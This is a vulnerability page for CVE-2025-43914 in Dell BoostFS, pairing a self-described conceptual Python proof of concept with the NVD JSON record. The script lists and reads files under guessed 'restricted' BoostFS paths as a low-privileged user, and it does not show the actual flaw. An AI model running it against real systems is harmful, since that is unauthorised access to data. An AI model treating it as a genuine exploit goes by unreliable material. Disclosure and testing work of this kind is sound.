CVE-2025-43914

# CVE-2025-43914 - Dell PowerProtect Data Domain BoostFS Privilege Assignment Vulnerability PoC # This is a conceptual PoC demonstrating the privilege assignment issue import os import subprocess import sys def check_boostfs_mount(): """Check if BoostFS is mounted on the system""" try: result = subprocess.run(['mount'], capture_output=True, text=True) if 'boostfs' in result.stdout.lower() or 'ddboost' in result.stdout.lower(): return True return False except Exception as e: print(f"Error checking mount: {e}") return False def check_current_user(): """Check current user privileges""" uid = os.getuid() username = subprocess.run(['whoami'], capture_output=True, text=True).stdout.strip() return uid, username def test_privilege_escalation(mount_point): """ Test for privilege escalation via BoostFS Low-privileged users should not be able to access certain restricted resources """ uid, username = check_current_user() print(f"[*] Current user: {username} (UID: {uid})") if uid == 0: print("[!] Running as root, vulnerability test not applicable") return # Attempt to access restricted BoostFS resources restricted_paths = [ f"{mount_point}/admin", f"{mount_point}/config", f"{mount_point}/system", f"{mount_point}/.restricted", f"{mount_point}/backup/system" ] for path in restricted_paths: if os.path.exists(path): try: # Attempt read access to restricted resources files = os.listdir(path) print(f"[VULNERABLE] Unauthorized access to: {path}") print(f" Contents: {files[:5]}") # Attempt to read sensitive files for item in files[:3]: item_path = os.path.join(path, item) if os.path.isfile(item_path): with open(item_path, 'r') as f: content = f.read(100) print(f" Read from {item}: {content[:50]}...") except PermissionError: print(f"[SAFE] Access denied to: {path}") except Exception as e: print(f"[ERROR] {path}: {e}") def main(): print("=" * 60) print("CVE-2025-43914 PoC - BoostFS Privilege Assignment Check") print("=" * 60) if not check_boostfs_mount(): print("[!] BoostFS not detected on this system") sys.exit(1) # Common BoostFS mount points mount_points = ['/mnt/boostfs', '/boostfs', '/mnt/ddboost', '/ddboost'] for mp in mount_points: if os.path.exists(mp): print(f"\n[*] Checking mount point: {mp}") test_privilege_escalation(mp) print("\n[*] Test completed") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-43914", "sourceIdentifier": "[email protected]", "published": "2025-10-07T18:16:00.000", "lastModified": "2026-02-12T17:14:05.740", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell PowerProtect Data Domain BoostFS for Linux Ubuntu systems of Feature Release versions 7.7.1.0 through 8.3.0.15, LTS2025 release version 8.3.1.0, LTS2024 release versions 7.13.1.0 through 7.13.1.30, LTS 2023 release versions 7.10.1.0 through 7.10.1.60, contain an Incorrect Privilege Assignment vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Unauthorized access."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.7.1.0", "versionEndExcluding": "7.10.1.70", "matchCriteriaId": "7FCE50EA-F2B8-4455-A489-1947B0CBFEEA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.13.1.0", "versionEndIncluding": "7.13.1.40", "matchCriteriaId": "B451DCE2-896E-4DFC-AA2B-CA1B0C257BAD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0.0", "versionEndIncluding": "8.3.0.15", "matchCriteriaId": "303AC151-B605-4F51-B001-197787B6B54E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.1.0", "versionEndExcluding": "8.3.1.10", "matchCriteriaId": "9E0743E3-14E7-4FF9-88C5-E038D62F2344"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000376224/dsa-2025-333-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}